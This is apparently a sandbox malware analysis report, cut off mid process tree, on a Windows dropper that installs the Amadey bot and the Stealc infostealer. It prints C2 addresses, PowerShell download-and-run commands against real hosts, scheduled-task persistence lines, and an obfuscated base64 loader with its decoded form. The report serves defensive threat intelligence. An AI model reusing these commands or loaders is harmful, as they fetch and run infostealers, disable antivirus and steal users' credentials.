Overview

overview

10

Static

static

3

05c8f3700c...9c.exe

windows7-x64

10

05c8f3700c...9c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 07:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    05c8f3700c6327871c199be6417c5c9c.exe

  • Size

    1.9MB

  • MD5

    05c8f3700c6327871c199be6417c5c9c

  • SHA1

    8f4862310762601e271ac27535382d5c7ed740e7

  • SHA256

    18cd20dd8567ce6137508f9dece0571f32741ddaa15d8884ad090a4dce7bab1a

  • SHA512

    76ea3ebcbe8397496a39cb278251839afa966a04a0451891c8300b1a97136b981ba04f903c6f85d83e8724346dda84613a3b99a52c2da4feff72f6d0f35e9bbc

  • SSDEEP

    49152:qsbYVKQjiw4DQIf0XkzgUAkDObQLNuWHxr7+:LRw4EXgObmHx

Score
10/10
amadeyhealerstealc092155trumpbootkitdefense_evasiondiscoverydropperevasionexecutionexploitpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 2 IoCs
    defense_evasion
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file 14 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Sets service image path in registry 2 TTPs 7 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
    defense_evasion
  • Loads dropped DLL 25 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 11 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\05c8f3700c6327871c199be6417c5c9c.exe
    "C:\Users\Admin\AppData\Local\Temp\05c8f3700c6327871c199be6417c5c9c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Users\Admin\AppData\Local\Temp\10338550101\1b53bc2d1c.exe
        "C:\Users\Admin\AppData\Local\Temp\10338550101\1b53bc2d1c.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn j0yxomatRpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn j0yxomatRpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2784
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3780
            • C:\Users\Admin\AppData\Local\TempSZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE
              "C:\Users\Admin\AppData\Local\TempSZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2944
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:3648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "0iBq6mao6ze" /tr "mshta \"C:\Temp\qIMBKt6xw.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2952
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\qIMBKt6xw.hta"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1568
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3192
      • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe
        "C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c 67e2ff36de8a3.vbs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2928
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@GI@awBt@EE@awBt@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4080
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1096
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3560
      • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3096
        • C:\Users\Admin\AppData\Local\Temp\11.exe
          "C:\Users\Admin\AppData\Local\Temp\11.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2860
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F81B.tmp\F81C.tmp\F81D.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
            5⤵
              PID:5040
              • C:\Users\Admin\AppData\Local\Temp\11.exe
                "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4272
                • C:\Windows\system32\cmd.exe
